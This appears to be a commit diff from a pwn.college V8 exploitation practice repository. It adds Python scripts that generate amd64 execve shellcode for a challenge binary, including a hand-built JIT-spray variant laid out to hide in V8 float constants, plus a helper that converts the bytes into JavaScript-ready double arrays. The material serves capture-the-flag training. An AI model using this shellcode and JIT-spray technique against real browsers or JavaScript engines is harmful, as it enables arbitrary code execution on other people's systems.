Moved JavaScript/PwnCollegeV8Exploitation/ to PwnCollege/V8Exploitation/

PwnCollege/V8Exploitation/ShellCode/Level1_catflag.py

@@ -0,0 +1,20 @@
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+# execve("/challenge/catflag", NULL, NULL)
+assembly = f"""
+/* Craft envp to rdx */
+{shellcraft.amd64.push(0)}
+{shellcraft.amd64.mov("rdx", "rsp")}
+/* Craft argv to rsi */
+{shellcraft.amd64.push(0)}
+{shellcraft.amd64.mov("rsi", "rsp")}
+/* Craft pathname to rdi */
+{shellcraft.amd64.pushstr("/challenge/catflag")}
+{shellcraft.amd64.mov("rdi", "rsp")}
+/* syscall execve */
+{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")}
+""".strip()
+
+dump_machine_code(assembly)

PwnCollege/V8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py

@@ -0,0 +1,46 @@
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+# execve("catflag", NULL, NULL)
+
+assembly = f"""
+/* Craft envp to rdx */
+xor     rdx, rdx            /* 3 */
+/* Craft argv to rsi */
+xor     rsi, rsi            /* 3 */
+jmp     (. + 0x2) + 0xc     /* 2 */
+/* Craft pathname to rdi */
+mov     eax, 0x0067616c     /* 5 */
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+shl     rax, 32             /* 4 */
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+mov     ebx, 0x66746163     /* 5 */
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+or      rax, rbx            /* 3 */
+push    rax                 /* 1 */
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+mov     rdi, rsp            /* 3 */
+nop
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+/* syscall execve */
+{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")}         /* 5 */
+int3                        /* 1 */
+int3                        /* 1 */
+int3                        /* 1 */
+""".strip()
+
+dump_machine_code(assembly)

PwnCollege/V8Exploitation/ShellCode/common.py

@@ -0,0 +1,29 @@
+from pwn import asm, disasm, util
+import struct
+
+def i2f(x):
+    return struct.unpack('!d', struct.pack('!Q', x))[0]
+
+def f2i(x):
+    return struct.unpack('!Q', struct.pack('!d', x))[0]
+
+def dump_machine_code(assembly: str) -> None:
+    machine_code = asm(assembly)
+    print("Assembly:")
+    print(assembly)
+    print("Byte Array:", list(machine_code))
+    padding = b"\xcc" * ((4 - len(machine_code)) % 4)
+    unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=True)
+    unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 32, endian='little', sign=False)
+    print("Signed DWord Array:", unpacked_signed_array)
+    print("Unsigned DWord Array:", unpacked_unsigned_array)
+    print("Hex DWord Array:", list(map(hex, unpacked_unsigned_array)))
+    padding = b"\xcc" * ((8 - len(machine_code)) % 8)
+    unpacked_signed_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=True)
+    unpacked_unsigned_array = util.packing.unpack_many(machine_code + padding, 64, endian='little', sign=False)
+    print("Signed QWord Array:", unpacked_signed_array)
+    print("Unsigned QWord Array:", unpacked_unsigned_array)
+    print("Hex QWord Array:", list(map(hex, unpacked_unsigned_array)))
+    print("Double Array:", list(map(i2f, unpacked_unsigned_array)))
+    print("Disassembled-assembly:")
+    print(disasm(machine_code))